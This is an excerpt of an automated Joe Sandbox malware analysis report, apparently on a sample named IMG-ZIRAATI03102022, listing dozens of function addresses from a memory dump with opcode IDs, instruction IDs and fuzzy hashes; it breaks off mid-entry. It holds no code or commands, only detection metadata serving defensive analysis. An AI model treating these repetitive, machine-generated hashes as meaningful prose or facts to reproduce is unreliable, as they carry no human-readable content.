                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067F20 Relevance: .0, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 23c6315ff6dead6ca72092a3bb924a188d07fe844b1fd79c11aed57fff325212
                                                                                                                              • Instruction ID: e9c674363a463050f6344323c2b76d65c929d4680daaa9b740a41cedd7e81f1a
                                                                                                                              • Opcode Fuzzy Hash: 23c6315ff6dead6ca72092a3bb924a188d07fe844b1fd79c11aed57fff325212
                                                                                                                              • Instruction Fuzzy Hash: F801F775E011099FCB54EBB8E4117EE7BE9EF44204F1040BAE10ED7B91EB308A5487E2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06060F70 Relevance: .0, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5055e8081c869f686ce5e09494865974baa04d97030a012581328c7a6d265160
                                                                                                                              • Instruction ID: 9ead0ee37b434b1e2083a6cb3c2cc86e6607eebba46819a8a69c880df7c92119
                                                                                                                              • Opcode Fuzzy Hash: 5055e8081c869f686ce5e09494865974baa04d97030a012581328c7a6d265160
                                                                                                                              • Instruction Fuzzy Hash: F40192306847049FD364DF66D598A6FBBFAFF80214710091DE18787A60CB70B849C760
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06060B98 Relevance: .0, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 324bc5164f1e355c999595dfd068556973c09ad39c5f1bbb522e588fbf72ab29
                                                                                                                              • Instruction ID: 90988b8089d45cac8d057167372df4d47a6971e9ba205ba9dcfc6480c7955796
                                                                                                                              • Opcode Fuzzy Hash: 324bc5164f1e355c999595dfd068556973c09ad39c5f1bbb522e588fbf72ab29
                                                                                                                              • Instruction Fuzzy Hash: 64019E313453418FCB669F79E48806B7BFAEFC5214315497ED14AC7752DB34584A8B81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060670AA Relevance: .0, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 60e0072635cd37a0a759f6887df8b89a3c7dfb391f9c186710ba43bf6ab9237e
                                                                                                                              • Instruction ID: 417abecd987ad320ee60eaaa1050b299bad6fe55e2fba4c8e37cc460a4f81321
                                                                                                                              • Opcode Fuzzy Hash: 60e0072635cd37a0a759f6887df8b89a3c7dfb391f9c186710ba43bf6ab9237e
                                                                                                                              • Instruction Fuzzy Hash: 03019A30A013149FC7A4DB78D8048EBBBF9FF89211B1444AEE49AC7740C730A902CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06068238 Relevance: .0, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5ccff201ac644d576778e2ad44077ec6160365d664018420d3234a4e57dc09b0
                                                                                                                              • Instruction ID: c2d775800c062d95a856f73a7de16c28b434fdeedb826bcbd00705ec044c1750
                                                                                                                              • Opcode Fuzzy Hash: 5ccff201ac644d576778e2ad44077ec6160365d664018420d3234a4e57dc09b0
                                                                                                                              • Instruction Fuzzy Hash: 46012C35B402199FDB549F69C801B9EBBF5EF48710F10406AEA05EB3A1D7719911CBD4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606BB78 Relevance: .0, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1179f3c76b3eb2be63d55e344903d79ebf4ae876372a57406fba694683a1c1c8
                                                                                                                              • Instruction ID: 06befc12112a65f546d1cae43e0a7adc6d62f1e17aa580176a81abda5365e1a6
                                                                                                                              • Opcode Fuzzy Hash: 1179f3c76b3eb2be63d55e344903d79ebf4ae876372a57406fba694683a1c1c8
                                                                                                                              • Instruction Fuzzy Hash: 85F02B3274435027E32132749C51BEB2A8B5FD6960F15467AF209EF7C1CCA45C0213E5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06060BA8 Relevance: .0, Instructions: 41COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6eadd2fd4cf0ea19400a79fa1d03762987e4c8471f4c42b4525eee7adf84a9d1
                                                                                                                              • Instruction ID: 55694b70b363cdfb9e0e71317b110845e1fb6bd490ae32508d09e68ab9765534
                                                                                                                              • Opcode Fuzzy Hash: 6eadd2fd4cf0ea19400a79fa1d03762987e4c8471f4c42b4525eee7adf84a9d1
                                                                                                                              • Instruction Fuzzy Hash: 93016D313413018B8B69AF79E48C57FBBEBEBC4255314893ED14BC7750DB34984A9B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06061BB0 Relevance: .0, Instructions: 40COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: de52b6ae753ed0253b9f4736d267a1756c04ef9a18a42ebc8fa66d07e3599d94
                                                                                                                              • Instruction ID: 345c28f233594a644483a0c24771192c264427e031c3b1458342bb89a7b8e1c9
                                                                                                                              • Opcode Fuzzy Hash: de52b6ae753ed0253b9f4736d267a1756c04ef9a18a42ebc8fa66d07e3599d94
                                                                                                                              • Instruction Fuzzy Hash: 0A010875D01209AFCF45DFA9D9058EEBFF1BF4C210B108166E919A7221E3319A21DFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06069650 Relevance: .0, Instructions: 39COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9d90a48e221353f373174ea9e63ac8f8df852eea2b39f47b578ac0b22bd776f0
                                                                                                                              • Instruction ID: cfcb1461b875b64a85d47d51db21599831e3d0f1579b0cadcd5324142c033f02
                                                                                                                              • Opcode Fuzzy Hash: 9d90a48e221353f373174ea9e63ac8f8df852eea2b39f47b578ac0b22bd776f0
                                                                                                                              • Instruction Fuzzy Hash: 26F0903061A3648FC7559B35AD048A6BFA9AF0621530581D7F004CBA63CB31DC41C7A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606BD00 Relevance: .0, Instructions: 39COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dd3e0f3ff5062857a088b14a20ad454d18584c07444874ce1f9dd29826becf8c
                                                                                                                              • Instruction ID: dbd3b65169ee7922e60405dda7faa0bd51e395456bfa4a04d6337bab8a0b8a93
                                                                                                                              • Opcode Fuzzy Hash: dd3e0f3ff5062857a088b14a20ad454d18584c07444874ce1f9dd29826becf8c
                                                                                                                              • Instruction Fuzzy Hash: 49F02E3279434177E77121325C11BAA3F951F82F50F054667F644EF5E1EBA4681183E5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060619C0 Relevance: .0, Instructions: 39COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 66e28517732a2628766b2c0d636abeebfc185afdfc2d21821072301226574395
                                                                                                                              • Instruction ID: 660b82fee11d27601a81aad98d69b62ac21277749e4affc2b8919cde129585c5
                                                                                                                              • Opcode Fuzzy Hash: 66e28517732a2628766b2c0d636abeebfc185afdfc2d21821072301226574395
                                                                                                                              • Instruction Fuzzy Hash: 460178716487D05FD766CB38C504B5BBFF6AB06208F0804CEE186DB6A2C326E808C761
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06069DC0 Relevance: .0, Instructions: 39COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8e141e27fc761c58b3298768cdd919c59098db664a01ecd671728bd90085c165
                                                                                                                              • Instruction ID: 0cdc694c427673d316019af3cc7bb54babbf342915f02ebb32fe646c845c01ef
                                                                                                                              • Opcode Fuzzy Hash: 8e141e27fc761c58b3298768cdd919c59098db664a01ecd671728bd90085c165
                                                                                                                              • Instruction Fuzzy Hash: F5F0A0327496601F8799517A7C118FF6FE9CBCA160314807BF019C7692CC190D4243B6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06064B02 Relevance: .0, Instructions: 38COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e286f5f216a8e501215703c13f5e302af9c1fd8c20ecd355af69f11c60309a9e
                                                                                                                              • Instruction ID: a79038e3ab5fe12e2c1a28264d6e5d21255cbddf775573c72a8a3ca535bcb806
                                                                                                                              • Opcode Fuzzy Hash: e286f5f216a8e501215703c13f5e302af9c1fd8c20ecd355af69f11c60309a9e
                                                                                                                              • Instruction Fuzzy Hash: 60F08C34E012159FC794DF78E4897EEBFF4AF08200F1054A9E55ACB651E7308982CBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060670B8 Relevance: .0, Instructions: 38COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ee0b79f73e9561e936843e5c9fce460cc3e799cf5492e2db33d7a3140b0fffe3
                                                                                                                              • Instruction ID: 98106759d82292aa0d9a0ab493008478c37b959e45ff40b24f33e5bf83386fc7
                                                                                                                              • Opcode Fuzzy Hash: ee0b79f73e9561e936843e5c9fce460cc3e799cf5492e2db33d7a3140b0fffe3
                                                                                                                              • Instruction Fuzzy Hash: 4F016931A003149FC790DFB9D9048ABBBFAFF89211B10446EE55AC3740DB31E902CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606969F Relevance: .0, Instructions: 37COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 22fb14c989590fd95feaf19cc6599e4ede39c1bef15e4b4ad5a4b64f6101ce9c
                                                                                                                              • Instruction ID: 2204633151799a66e204c5067f5fc62a4e08a2c823099f58d92be20590627627
                                                                                                                              • Opcode Fuzzy Hash: 22fb14c989590fd95feaf19cc6599e4ede39c1bef15e4b4ad5a4b64f6101ce9c
                                                                                                                              • Instruction Fuzzy Hash: 40F0A7227452611BC79556366C149FF6FD98BC6124B04807AF059C7641CC284D0543B2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606BB88 Relevance: .0, Instructions: 37COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c41186a8d54840067d86bb734a70cef8d81e63a990af5c3e883705664a3f8287
                                                                                                                              • Instruction ID: 1340bf3a707b42c692ff97883ba35ec57598771f1d58ad4bd6a418627eca4069
                                                                                                                              • Opcode Fuzzy Hash: c41186a8d54840067d86bb734a70cef8d81e63a990af5c3e883705664a3f8287
                                                                                                                              • Instruction Fuzzy Hash: DFF0E53279431023F624317A5C91BAF658F9FD6E60F154639F30AAB7C0CCE4AC0112D8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06064400 Relevance: .0, Instructions: 37COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ae40e0946df7d9835d417ed0a68b6fb56e0bcd73e504903c5c664bf26f3456ec
                                                                                                                              • Instruction ID: 7339cfc0cbe7b19ac0415f377ef07111c825c5c3d9107b71d0f0162bb44384c6
                                                                                                                              • Opcode Fuzzy Hash: ae40e0946df7d9835d417ed0a68b6fb56e0bcd73e504903c5c664bf26f3456ec
                                                                                                                              • Instruction Fuzzy Hash: 32F0B431790325479690BA2AE49465BBFDAFBD26943418429EA0FCBB44DF71EC0547D0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606BD10 Relevance: .0, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3a4b4b651dee511e4abd5701668b1082f27188470216edc5b53efaabbc202f4a
                                                                                                                              • Instruction ID: 513eaa31d9c2756378e3f8b1680ebca6354f502a77fe4cc8d25cdb57575e51ff
                                                                                                                              • Opcode Fuzzy Hash: 3a4b4b651dee511e4abd5701668b1082f27188470216edc5b53efaabbc202f4a
                                                                                                                              • Instruction Fuzzy Hash: 63F0E53279031567F7B421375C02B6E36C64BC1E50F114625FB09EF6D0EEB5A8118299
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060689C9 Relevance: .0, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1c3f75e4fd1f4d5b3669842ea175ccdbd9e1e3e9d4e58ef7f5147b861ffd521f
                                                                                                                              • Instruction ID: d9520b2e7fec7e539f164c057782dd2b92193c30eb0041a6508337d215900f09
                                                                                                                              • Opcode Fuzzy Hash: 1c3f75e4fd1f4d5b3669842ea175ccdbd9e1e3e9d4e58ef7f5147b861ffd521f
                                                                                                                              • Instruction Fuzzy Hash: 1FF09630D5D2B05AE3A143256914264BFE26BC3209B1CC4DAE0E84E597C177C64BCBB0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06069131 Relevance: .0, Instructions: 33COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8839060fccc84bce359e5ee738f19da48b23ed941c4a2bcf4d5ab57390705706
                                                                                                                              • Instruction ID: 62a25397f8fa3fb61f1f865150a0fbdf68d4c9fde9e244938268932657ee9894
                                                                                                                              • Opcode Fuzzy Hash: 8839060fccc84bce359e5ee738f19da48b23ed941c4a2bcf4d5ab57390705706
                                                                                                                              • Instruction Fuzzy Hash: A0E06531B462605F8BAA22397C158EF6BE98AC692831480AFE015CB641CD25484287F6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606E932 Relevance: .0, Instructions: 32COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 68a7bd33f000e0af3cf81cdbf84af4e57ae736291f99ec1f3b54c830f26f7dc6
                                                                                                                              • Instruction ID: 8b7f9e9b7cb4184e01180bb7e8c16e64b1bc0e79268c9f2c57f52bcaf7b09b46
                                                                                                                              • Opcode Fuzzy Hash: 68a7bd33f000e0af3cf81cdbf84af4e57ae736291f99ec1f3b54c830f26f7dc6
                                                                                                                              • Instruction Fuzzy Hash: 60E09A317412605FCB9A22396C158EE7BEA8ACA520304406BE019CBA81CD254C4343F6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06064B10 Relevance: .0, Instructions: 30COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 90734836722167ea3d682df3926f0e864b7fb5e7bb17b5d4684e4e59c2399437
                                                                                                                              • Instruction ID: 8e9c4f1778f810031d8629075e4e788811314ceda924a36246f46223e1b19ce2
                                                                                                                              • Opcode Fuzzy Hash: 90734836722167ea3d682df3926f0e864b7fb5e7bb17b5d4684e4e59c2399437
                                                                                                                              • Instruction Fuzzy Hash: 40F03A70E042159FCB84DFA9D48879EBBF5BF08204F1454A9E919DB256E770D981CBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606AC93 Relevance: .0, Instructions: 30COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6aadcbcd7c0feff0ac05a1fab3ac5f925533013b7ec9b5761d3915e303e1595f
                                                                                                                              • Instruction ID: b27b6fa5a5f008774ffe6baea116df30756f525078cc7d8057aeb6d0cff69011
                                                                                                                              • Opcode Fuzzy Hash: 6aadcbcd7c0feff0ac05a1fab3ac5f925533013b7ec9b5761d3915e303e1595f
                                                                                                                              • Instruction Fuzzy Hash: B2F01D30B841068FD790FBA6C4A5BAE7BF1AF45214F254824E103EB354DB30D940CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606AC9C Relevance: .0, Instructions: 30COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6aadcbcd7c0feff0ac05a1fab3ac5f925533013b7ec9b5761d3915e303e1595f
                                                                                                                              • Instruction ID: b27b6fa5a5f008774ffe6baea116df30756f525078cc7d8057aeb6d0cff69011
                                                                                                                              • Opcode Fuzzy Hash: 6aadcbcd7c0feff0ac05a1fab3ac5f925533013b7ec9b5761d3915e303e1595f
                                                                                                                              • Instruction Fuzzy Hash: B2F01D30B841068FD790FBA6C4A5BAE7BF1AF45214F254824E103EB354DB30D940CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060642E0 Relevance: .0, Instructions: 29COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d91e279d57c5ef6553dc020170fb02e8de1b50fcbac31e9fd9d9c9f5ab457052
                                                                                                                              • Instruction ID: b79e19884f06716fa5ed74fe643a9df25fc433574a81151a8cc6935cf87ab4c7
                                                                                                                              • Opcode Fuzzy Hash: d91e279d57c5ef6553dc020170fb02e8de1b50fcbac31e9fd9d9c9f5ab457052
                                                                                                                              • Instruction Fuzzy Hash: DCE086357513601BD759257E68415BB6BDEEBCA261724407EF11DDB341C9614C07C261
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060696B0 Relevance: .0, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cb75b36209d2eafb9ccbf91b3067640214dd16f6638bd0f0788cb6775768dfdc
                                                                                                                              • Instruction ID: eba3d2d28445d0e9c6208f5006e9beed14f4557046f204c34817a24e7d5fa135
                                                                                                                              • Opcode Fuzzy Hash: cb75b36209d2eafb9ccbf91b3067640214dd16f6638bd0f0788cb6775768dfdc
                                                                                                                              • Instruction Fuzzy Hash: 21E0C223340520274B98626F6C149FFBEDE8BC9574B14803AF11DC3341DC288D4243FA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067838 Relevance: .0, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2eaca417ac70f801d421ef1c6d4a6fd705753884426267f4c0cfe935b4d84bd9
